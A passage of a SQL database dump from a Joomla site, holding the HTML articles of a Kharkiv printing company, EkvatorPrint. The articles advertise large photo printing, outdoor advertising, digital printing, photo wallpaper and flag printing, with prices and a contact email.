00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',107,22,'изготовление баннера, баннерная сетка, баннер печать харьков, баннер харьков, изготовление наружной рекламы Харьков','Изготовление баннера. Баннерная сетка - легкий и удобный материал для наружной рекламы на транспорте и на фасадах.',1,39042,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(10,44,'Печать больших фотографий','2010-12-01-20-51-52','<table style=\"width: 700px; font-size: 110%;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\">\r\n<h1 style=\"text-align: center;\">Печать больших фотографий</h1>\r\n</td>\r\n</tr>\r\n<tr valign=\"middle\">\r\n<td>\r\n<p>У вас есть любимая вами фотография? Так почему бы вам не распечатать ее в большом размере и не поставить в рамочку на видное место?<span style=\"font-size: 120%; color: #0035ac; text-align: center;\"><br />Печать фотографий больших размеров для интерьера можно выполнить на холсте.</span></p>\r\n</td>\r\n<td>\r\n<p style=\"text-align: justify;\"><img style=\"margin: 0px; border: 0pt none;\" src=\"images/stories/bolwoe-foto.jpg\" alt=\"\" width=\"250\" border=\"0\" /></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr valign=\"middle\">\r\n<td><img style=\"margin: 5px; float: left; border: 1px solid grey;\" src=\"images/stories/vistavka.jpg\" alt=\"\" width=\"200\" border=\"0\" /></td>\r\n<td style=\"text-align: justify; font-size: 110%;\">\r\n<p><span style=\"color: #000000;\">А может Вы талантливый фотограф и у вас много прекрасных фото? - Тогда обязательно возьмите себе на заметку - <a style=\"color: #000000;\" title=\"широкоформатная печать Харьков\" href=\"/\"><strong>широкоформатная печать</strong></a> в <strong>ЭкваторПринт</strong> - это высокое качество на современном оборудовании.</span></p>\r\n<p><span style=\"color: #000000;\"><strong>Печать больших фотографий</strong> в ЭкваторПринт - это и отличный способ сделать подарок знакомым, и метод дизайна интерьера, а еще лучше и грандиозней - выбрать самые удачные снимки, осуществить <strong>печать больших фотографий</strong> и сделать свою выставку.</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"background-color: #6699cc;\">\r\n<td style=\"height: 2px;\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><img style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />Перечень всех услуг широкоформатной печати в \"ЭкваторПринт\":<br /><br />- <a title=\"печать на виниле\" href=\"printing-on-vinyl\">печать на виниле (на пленке)</a> - отлично подходит для наружной рекламы<br />- <a title=\"изготовление баннера\" href=\"banner-printing\">изготовление баннера</a> - материал высокой прочности<br />- <a title=\"печать на сетке баннерной\" href=\"printing-on-the-grid\">печать на сетке баннерной</a> - идеальный вариант для рекламы на фасадах с окнами<br />- <a title=\"изготовление наружной рекламы\" href=\"outdoor-advertising\">изготовление наружной рекламы</a> - (реклама на улицах, магазинах, вывески, билборды и т.д.)<br />- <a title=\"печать на холсте\" href=\"printing-on-canvas\">печать на холсте</a> - украсьте свой интерьер шикарным полотном<br />- <a title=\"печать фотообоев\" href=\"print-photo\">печать фотообоев</a> - уникальный дизайн вашего дома<br />- <a title=\"печать флагов\" href=\"print-flags\">печать флагов</a>, прославьте свой бренд<br />- <a title=\"широкоформатная печать ситилайтов\" href=\"print-citylights\">печать ситилайтов</a>, нуружная реклама на уровне взгляда прохожих</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,8,'2010-12-01 20:43:50',62,'','2021-04-26 11:26:24',62,0,'0000-00-00 00:00:00','2010-12-01 20:43:50','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',52,21,'печать больших фотографий, печать фотографий больших форматов','Широкоформатная печать больших фотографий. Цветная печать высокого качества. Печать фотографий осуществляется на современном оборудовании.',1,78029,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(11,45,'Изготовление наружной рекламы','2010-12-06-15-15-58','<table style=\"width: 600px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1 style=\"text-align: center;\">Изготовление наружной рекламы</h1>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p><img src=\"images/stories/narugnaja-kreativ-reklama.jpg\" border=\"0\" style=\"float: left; margin: 5px 10px; border: 1px solid grey;\" /></p>\r\n<p style=\"text-align: justify;\"><strong>Наружная реклама</strong> встречается нам повсюду - на улицах и на проспектах, на витринах магазинов и у прилавков, внутри помещений, в офисах, на выставках. <br /><span style=\"color: #0000ff;\"><strong>Без наружной рекламы современному бизнесу никуда!</strong></span></p>\r\n<p style=\"text-align: justify;\"><strong>Наружная реклама</strong> как <strong>в Харькове</strong> так и в других городах, это<strong> </strong>раскручивание бренда, реклама товара, а также авторитет среди потенциальных клиентов. Помимо этого, <strong>изготовление наружной рекламы</strong> для вашего офиса, магазина, сделает вас заметными среди однотипных построек такого большого города, как Харьков.</p>\r\n<table style=\"width: 600px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p style=\"text-align: justify;\">Отметим, что <strong>изготовление наружной рекламы</strong> на&nbsp; стены здания, в котором находится ваш офис, \"убивает одним выстрелом двух зайцев\".&nbsp; Такая наружная реклама не только прославит ваш товар/услугу, но и станет хорошим ориентиром для клиентов.</p>\r\n</td>\r\n<td><img src=\"images/stories/eko.jpg\" border=\"0\" width=\"120\" style=\"float: right; border: 1px solid grey; margin-left: 5px; margin-right: 5px;\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Изготовление наружной рекламы от <span style=\"color: #0000ff;\">Экватор</span><span style=\"color: #0000ff;\">Принт</span> это:</h4>\r\n- <a href=\"banner-printing\" title=\"изготовление баннера\">изготовление баннера</a><br />- изготовление вывесок<br />- реклама на билбордах<br />- <a href=\"print-citylights\" title=\"сити лайты Харьков\">реклама на сити лайтах</a><br />- реклама на магазинах<br />- реклама на улицах\r\n<p>Предоставляем качественные материалы для печати. Гарантируем яркие цвета и устойчивость к влияниям внешней среды.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<h4 style=\"text-align: left;\"><span style=\"color: #0000ff;\">Когда началось изготовление наружной рекламы</span></h4>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/narugnaja-reklama-stqrina.jpg\" border=\"0\" alt=\"наружная реклама\" title=\"наружная реклама\" width=\"200\" style=\"margin: 5px; float: left; border: 1px solid grey;\" /> <strong>Изготовление наружной рекламы</strong> – самое первое и самое давнее проявление рекламной деятельности. Наружная реклама появилась вскоре после возникновения письменности. <br /> <br /> С давних времен и по сей день наружная реклама держит пик популярности и наверное, никогда его не покинет. В наше время, наружная реклама остается одним из наиболее эффективных промо-инструментов. <br /> </p>\r\n<p style=\"text-align: justify;\">До 70х годов прошлого века <strong>изготовление наружной рекламы</strong> выполнялось вручную. Рекламные тексты и изображения наносилась на каменные стены, на деревянные или металлические плоскости.</p>\r\n<p style=\"text-align: justify;\">Сегодня же <strong>изготовление наружной рекламы</strong> – высокотехнологический автоматизированный процесс. Компьютерные системы позволили сделать прорыв в процессе изготовления наружной рекламы. Цифровая печать позволяет получать яркие и красочные изображения в кратчайшие сроки.</p>\r\n<p style=\"text-align: justify;\">В <strong>Харьков</strong>е и в Украине изготовление наружной рекламы в качестве широкоформатной печати стало особенно популярно с середины 90х годов. В то время стали широко применяться рекламные щиты, баннеры, растяжки.</p>\r\n<p style=\"text-align: justify;\">&nbsp;</p>\r\n<h4 style=\"text-align: left;\"><span style=\"color: #0000ff;\">Изготовление эффективной наружной рекламы. Рекомендации.</span></h4>\r\n<p style=\"text-align: justify;\"><strong> </strong><img src=\"images/stories/narugnaja-reklama-effekt.jpg\" border=\"0\" width=\"200\" style=\"margin: 5px; float: left; border: 1px solid grey;\" />Приведем несколько рекомендаций, которые помогут изготовить эффективную наружную рекламу.<strong> </strong></p>\r\n<p style=\"text-align: justify;\"><strong><span style=\"color: #333333;\">Яркость.</span></strong> Наружная реклама не признает тонкостей и серости, она должна бросаться в глаза в первую же секунду, запоминаться легко и надолго, впечатлять прохожих своим дизайном, размерами и четкостью.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>Все гениальное - просто.</strong> </span>При изготовлении наружной рекламы следует исключить с плакатов, баннеров, вывесок двузначные слова и непонятные сложные рисунки. Наружная реклама – это мимолетный объект внимания, всего лишь на несколько секунд. Поэтому, изготовление наружной рекламы должно соответствовать следующему оформлению: одна картинка и рекламный текст, длинной не более 7 слов.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>Реклама с \"именем\".</strong></span><strong> </strong>По возможности персонифицируйте свою наружную рекламу. &nbsp;Это будет практично. Изготавливая наружную рекламу, введите в текст название города или имя ближайшего дилера.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>Вызовите эмоцию.</strong></span> Наружная реклама с эмоциональным контекстом запомнится зрителям намного дольше обычной пресной рекламы. И даже для уставших и голодных прохожих ваша наружная реклама может стать развлечением и вызвать улыбку.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>Используйте цвет.</strong></span> Доказано, что наиболее легким и приятным для чтения является черный текст на желтом фоне. Изготовление рекламы может быть выполнено и в другой цветовой комбинации, самое главное придерживаться основных цветов и никогда не использовать светлые оттенки на желтом фоне.</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #333333;\"><strong>География наружной рекламы. </strong></span>Не упускайте возможность наружной рекламы указывать на ваше место расположения. Предполагая разместить рекламу неподалеку от вашего офиса, добавьте надпись \"мы за поворотом\" и т.п., поставьте указательную стрелочку, обозначьте расстояние. Также в изготовление наружной рекламы можно включить этнические особенности предполагаемой аудитории.</p>\r\n<p style=\"text-align: justify;\">&nbsp;</p>\r\n<h4><a name=\"изготовление вывесок\"></a><span style=\"color: #0000ff;\">Изготовление вывесок</span></h4>\r\n<p style=\"text-align: justify;\"><strong><img src=\"images/stories/viveska.jpg\" border=\"0\" width=\"200\" style=\"margin: 5px; border: 1px solid grey; float: left;\" />Изготовление вывесок</strong> помогает в формировании имиджа компании. Так, изготовление ярких и эпатажных вывесок для ресторанов и салонов красоты, привлекает внимание всех проходящих мимо. А изготовление стильных и строгих вывесок для бизнеса, не только привлекает внимание , но и задет стиль и имидж компании.<br /> <br /> <strong>Изготовление вывесок</strong> в ЭкваторПринт – налаженный процесс не требующий много времени. Как только вы закажите изготовление вывески и пришлете свои эскизы – мы тот час же запустим вывеску в печать.<br /> <br /> А вот продумывать дизайн вывески – задача не из легких. К этому вопросу следует подойти серьезно. Вывеска компании должна быть запоминающейся. Особенно важно чтобы вывеска подчеркивала вашу индивидуальность и была связанной с видом вашей деятельности.<br /> <br /> Ныне <strong>изготовление вывесок в Харькове</strong> имеет несколько вариантов. Вы можете заказать изготовление вывески на рулонных материалах (баннер, сетка, самоклейка) или же изготовить вывески&nbsp; в виде объемных букв и с подсветками.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&nbsp;</p>\r\n<p>Интересно о:</p>\r\n<p>- <a href=\"digital-printing\" title=\"цифровая печать Харьков\">Что такое цифровая печать</a></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,8,'2010-12-06 15:15:33',62,'','2019-04-23 10:57:19',62,62,'2019-04-23 10:57:19','2010-12-06 15:15:33','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',55,20,'Изготовление наружной рекламы, изготовление баннера, изготовление вывесок, реклама на улицах, реклама на магазинах, реклама на билбордах, изготовление рекламы, наружная реклама харьков','Изготовление наружной рекламы: баннера, вывесок, реклама на улицах, на магазинах, на билбордах. материалы для рекламы и цветная цифровая печать.',1,27863,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(12,46,'Цифровая печать','digital-printing','<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1 style=\"text-align: center;\">Что такое цифровая печать</h1>\r\n<p style=\"text-align: justify;\"><strong><img src=\"images/stories/cifrovaja.jpg\" border=\"0\" style=\"float: left; margin: 5px; border: 1px solid grey;\" />Цифровая печать</strong> <strong>Харьков</strong> на сегодняшний день наиболее популярна в полиграфии среди современных методов печати. Цифровая печать позволяет печатать плакаты непосредственно с компьютера и не требует никаких дополнительных процессов допечатной подготовки. А это, в свою очередь, существенно экономит время, затрачиваемое на изготовление печатной продукции.</p>\r\n<p style=\"text-align: justify;\"><strong>Цифровая печать</strong> представляет собой процесс получения оттисков при помощи использования меняющейся формы печати. За изменения параметров цифровой печати в устройстве управляет компьютер, соединенные с принтером. Цифровая печать тиражей не большого объема очень выгодна и рентабельна. Выгода данной цифровой печати кроется в возможности экономить на предпечатных дорогостоящих процедурах. И при этом, стоимость цифровой печати в Харькове не зависит от количества печатаемых экземпляров.</p>\r\n<p style=\"text-align: justify;\"><strong>В Харькове цифровая печать</strong> позволяет изготавливать малые объемы полиграфической продукции и предоставлять клиентам большой перечень печатных услуг (<a href=\"banner-printing\" title=\"изготовление баннера\">изготовление баннера</a>, <a href=\"printing-on-vinyl\" title=\"печать на виниле\">печать на виниле</a>, <a href=\"printing-on-canvas\" title=\"печать на холсте\">печать на холсте</a>, <a href=\"printing-on-the-grid\" title=\"сетка баннерная\">печать на сетке баннерной</a>, <a href=\"outdoor-advertising\" title=\"изготовление наружной рекламы\">изготовление наружной рекламы</a>). В Харькове и в других развитых городах и странах, <a href=\"/\" title=\"широкоформатная печать\">широкоформатная печать</a> является одной из важнейших областей, где применяется цифровая печать.</p>\r\n<p style=\"text-align: justify;\">Качество цифровой печати не ниже офсетной печати, &nbsp;и&nbsp; вдобавок, цифровая печать позволяет персонификацировать отпечатки, оперативно менять текст или изображения печатаемой продукции. Основной плюс в том. Что цифровая печать значительно снижает не только стоимость предпечатной подготовки (нет надобности изготавливать печатные формы и пленки), но также и риск потерять качество на стадиях выполнения печати. Цифровая печать, в качестве основы, позволяет использовать любой вид носителя: бумага, самоклейка, сетка…</p>\r\n<p style=\"text-align: justify;\"><strong>Харьков</strong> широко применяет цифровую печать малотиражной рекламной продукции. Внесение изменений в процессе цифровой печати возможно на любой стадии.</p>\r\n<h4 style=\"text-align: justify;\"><img src=\"images/stories/kraski.jpg\" border=\"0\" width=\"50\" style=\"vertical-align: middle; border: 0pt none; margin-left: 5px; margin-right: 5px;\" />Подытожим достоинства цифровой печати:</h4>\r\n<p style=\"text-align: justify;\">1. <strong>Цифровая печать</strong> позволяет предварительно просматривать вариант печати, также, перед самим процессом печати, можно распечатать пробный вариант будущей продукции. Такие возможности помогают наглядно оценивать дизайн рисунка и качество печати, а следовательно можно своевременно вносить изменения</p>\r\n<p style=\"text-align: justify;\">2. <strong>Цифровая печать</strong> не требует допечатная подготовки, изготовления форм и пленок. Исходя из этого, сам процесс печати обходится не дорого и без риска потери качества.</p>\r\n<p style=\"text-align: justify;\">3. Продукция <strong>цифровой печати</strong> заметна своим высоким качеством изображения. Качество цифровой печати становится особо заметно при печати профессиональных фотографий с натуральными объектами и произведений искусства.</p>\r\n<p style=\"text-align: justify;\">4.<strong> Цифровая печать</strong>, в отличии от офсетной, делает возможным вносить изменения в параметры печати после каждого печатного процесса.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,8,'2011-01-14 14:33:58',62,'','2019-04-23 10:54:15',62,62,'2019-04-23 10:54:15','2011-01-14 14:33:58','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,19,'цифровая печать, цифровая печать Харьков, цифровая печать в Харькове','Цифровая печать в Харькове - одна из самых востребованных услуг полиграфии. Цифровая печать имеет массу достоинств.',1,6743,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(13,47,'Печать фотообоев','2011-04-21-16-26-32','<h1 style=\"text-align: center;\">Печать фотообоев</h1>\r\n<div style=\"margin: 15px;\">\r\n	<p style=\"font-size: 120%;\">Компания Экваторпринт расположена <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины.</strong></p>\r\n	<p><span style=\"color: #0000ff; font-weight: bolder; font-size: 170%;\"><strong>Цена печати:</strong></span></p>\r\n	<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n		<tbody>\r\n			<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n				<td rowspan=\"2\" width=\"480\" height=\"60\"><span style=\"font-size: 130%; color: #ffec00;\"><strong>Материал</strong></span></td>\r\n				<td rowspan=\"2\" width=\"171\"><span style=\"color: #ffec00;\"><strong>Ширина рулона</strong></span></td>\r\n				<td width=\"128\"><span style=\"color: #ffec00; font-size: 130%;\"><strong>Стоимость</strong><br />(грн./м2) </span></td>\r\n			</tr>\r\n			<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n				<td width=\"64\"><span style=\"color: #ffec00;\"><strong>от 5м.кв</strong></span></td>\r\n			</tr>\r\n			<tr style=\"text-align: center;\">\r\n				<td style=\"text-align: left; font-size: 140%;\" width=\"309\" height=\"40\">Бумага \"Ситик\"</td>\r\n				<td width=\"171\">1.20</td>\r\n				<td width=\"64\"><span style=\"font-size: 160%;\">71</span></td>\r\n			</tr>\r\n			<tr style=\"text-align: center;\">\r\n				<td style=\"text-align: left; font-size: 140%;\" width=\"309\" height=\"40\">Художественный холст</td>\r\n				<td width=\"171\">104 /124 / 148</td>\r\n				<td width=\"64\"><span style=\"font-size: 160%;\">290</span></td>\r\n			</tr>\r\n		</tbody>\r\n	</table>\r\n	<p>&nbsp;</p>\r\n	<p style=\"background-color: #dbdbda; color: #0000ff; font-size: 180%; font-weight: bolder;\">Заказать печать:</p>\r\n	<p><span style=\"font-style: oblique; font-weight: bolder; font-size: 170%;\">Принимаем заказы по e-mail: <span style=\"background-color: orange; font-size: 120%;\"><a href=\"mailto:e@ekvatorprint.com.ua\">e@ekvatorprint.com.ua</a></span></span>\r\n	</p>\r\n	<p>&nbsp;</p>\r\n	<p style=\"background-color: #fcfc85; border-radius: 10px; font-size: 130%;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Для печати фотообоев мы предлагаем два вида материала:<br /><br /> <span style=\"text-align: justify;\">&nbsp; 1. <strong>Постерная бумага \"Ситик\"</strong>. Данный материал наиболее экономичен для печати фотообоев, и в то же время на нем можно добиться высокого качества печати (1440dpi). Материал имеет гладкую структуру и отлично клеится на любую подготовленую поверхность. Фотообои на постерной бумаге отлично подойдут для оклейки стен в офисах, кафе, торговых центрах при небольших затратах.<br /><br /> &nbsp; 2. <strong>Художественный холст.</strong> Материал представляет собой ткань покрытую грунтом. Фотообои на художественном холсте отлично подходят для оклейки стен в кафе, квартирах, офисах, магазинах, торговых центрах и т.д.&nbsp;&nbsp;</span></p>\r\n	<p style=\"color: #0000ff; font-size: 170%; font-weight: bolder;\">Наши работы:</p>\r\n	<p><img src=\"images/phocagallery/Fotooboi/Fotooboi-3.jpg\" alt=\"Печать для кофейни фотообоев на художественном холсте.\" style=\"border: 3px solid #3300ff;\" width=\"335\" height=\"222\" /><img src=\"images/phocagallery/Bumaga-bluback/Bumaga-bluback-1.jpg\" alt=\"Печать фотообоев на бумаге &quot;Ситик&quot;. \" style=\"border: 3px solid #3300ff;\" width=\"337\" height=\"222\" /></p>\r\n	<hr />\r\n	<p>&nbsp;</p>\r\n	<p style=\"text-align: justify;\"><strong><img style=\"float: left; margin: 10px; border: 1px solid grey;\" src=\"images/stories/bawnja.jpg\" alt=\"\" border=\"0\" /></strong></p>\r\n</div>\r\n<div style=\"font-size: 130%; margin: 15px;\">\r\n	<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>Печать фотообоев</strong> открывает массу возможностей, только подумайте: вы можете жить возле <strong>Эйфелевой башни</strong>, просыпаться и видеть яркое и радужное <span style=\"color: #333333;\"><strong>ромашковое поле</strong>,</span> наслаждаться романтическим закатом и вспоминать тот самый волшебный отпуск…</span><br /><span style=\"color: #000000;\">Все-все, что пожелаете видеть в своем доме – все возможно!</span></p>\r\n	<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><span style=\"color: #333333;\"><strong>Печать фотообоев</strong></span> не знает ограничений, ни в просторах фантазии при выборе рисунка ни в масштабах. Наше современное оборудование, выполняет цветную и яркую широкоформатную печать любых размеров.</span>\r\n	</p>\r\n	<p><img style=\"float: right; margin: 15px 10px; border: 1px solid grey;\" src=\"images/stories/romawki.jpg\" alt=\"\" width=\"300\" border=\"0\" /></p>\r\n	<p>&nbsp;</p>\r\n	<p>Уверяем вас, печать фотообоев – это возможность внести в вашдом некую изюминку, которая будет, словно магнит, притягивать к себе взгляды, завораживать, дарить тепло, уют и вовлекать в атмосферу выбранного рисунка.<br /><br />Современная широкоформатная печать, позволяет изготавливать фотообои не только ярких, насыщенных цветов, но и стойких. Фотообои будут радовать вас своей красотой долгие годы.<br /><br /></p>\r\n	<h4><strong>А теперь подробнее о там, как и на чем осуществляется печать фотообоев</strong></h4>\r\n	<h4>Материал печати</h4>\r\n	<p>Печать фотообоев осуществляется на специальном материале, который предназначен исключительно для фотообоев. <br /><br />Ширина фотообоев составляет 1,3 м, поэтому их поклейка будет весьма удобной. А поскольку материал устойчив к стиранию, то их долгий срок службы вам гарантирован<br /><br /></p>\r\n	<h4>Качество печати</h4>\r\n	<p style=\"text-align: justify;\"><span style=\"color: #000000;\">С нашей стороны, мы гарантируем, что наше оборудование выполнит печать фотообоев с ярким, четким и контрастным изображением. Ну а вам остается только предоставить нам фотографию будущих обоев высокого качества в электронном виде.</span></p>\r\n	<h4>Где найти изображение для фотообоев?</h4>\r\n	<p style=\"text-align: center;\"><img style=\"border: 1px solid grey; float: right; margin-left: 10px; margin-right: 10px;\" src=\"images/stories/zakat.jpg\" alt=\"\" height=\"200\" border=\"0\" /></p>\r\n	<p style=\"text-align: justify;\">Интернет открывает перед нами массу возможностей, поэтому найти среди многочисленных картинок интернет понравившееся вам изображение, не проблема. Ассортимент картинок исчисляется миллионами.<br /><br />Наиболее качественные и профессиональные фотографии вы найдете на сайтах «фотобанка».<br /><br />Еще один оригинальный вариант, заказать фотосессию и обработку фотографий у фотографа. Так вы сможете заказать печать фотообоев с изображением вашей дружной семьи, с сияющей улыбкой своего ребенка… Опять же, тут тоже нет пределов для полета фантазии. <br /><br /></p>\r\n	<h4>Печать фотообоев – только первый этап, а вот как их клеить?</h4>\r\n	<p><img style=\"float: left; margin-left: 5px; margin-right: 5px; border: 1px solid grey;\" src=\"images/stories/kleit.jpg\" alt=\"\" border=\"0\" /></p>\r\n	<p>&nbsp;</p>\r\n	<p>Поклейка фотообоев производится клеем для тяжелых фотообоев стык в стык. Особой подготовки для стен не требуется, основное условие, чтобы они были ровными.<br /><br />Каждый имеющий опыт работы с обоями, без труда поклеит и фотообои. Ну а в ином случае, можно привлечь специалистов</p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;<img style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />\"ЭкваторПринт\" также оказывает следующие услуги:<br /><br />- <a title=\"печать на холсте\" href=\"printing-on-canvas\">печать на холсте</a> - дайте своему фото новую жизнь<br /> - <a title=\"печать на виниле\" href=\"printing-on-vinyl\">печать на виниле</a> - яркая и недорогая наружная реклама<br />- <a title=\"печать на сетке баннерной\" href=\"printing-on-the-grid\">печать на сетке баннерной</a> - реклама на транспорте объедет весь город<br />- <a title=\"изготовление наружной   рекламы\" href=\"outdoor-advertising\">изготовление наружной рекламы</a> - все форматы и высокое качество<br />- <a title=\"печать   больших фотографий\" href=\"print-great-photos\">печать больших фотографий </a>- лучшему фото - достойный формат<br />- <a href=\"modulnye-kartiny\">модульные картины</a>&nbsp;- неповторимый стиль вашего дома<br />- <a href=\"print-flags\">печать флагов</a> - престижная реклама фирмы<br />- <a title=\"широкоформатная печать ситилайтов\" href=\"print-citylights\">печать ситилайтов</a>, наружная реклама на уровне глаз человека</p>','',1,8,'2011-04-21 16:23:06',62,'','2022-01-25 12:01:19',62,0,'0000-00-00 00:00:00','2011-04-21 16:23:06','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',179,18,'Печать фотообоев, печать на обоях','Печать фотообоев в Харькове - ЭкваторПринт.',1,71919,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(14,48,'Печать флагов','2011-04-26-17-31-04','<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr>\r\n			<td style=\"text-align: center;\">\r\n				<h1 style=\"text-align: center;\">Печать флагов</h1>\r\n				<p style=\"text-align: left;\">Компания Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины.</strong></p>\r\n				<p style=\"text-align: left;\"><span style=\"color: #0000ff;\"><span style=\"font-size: medium;\"><strong>Цена печати:</strong></span></span>\r\n				</p>\r\n				<table style=\"width: 695px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n					<colgroup>\r\n						<col width=\"309\" />\r\n						<col width=\"171\" />\r\n						<col width=\"87\" />\r\n						<col span=\"2\" width=\"64\" /> </colgroup>\r\n					<tbody>\r\n						<tr style=\"text-align: center; background-color: #172983; height: 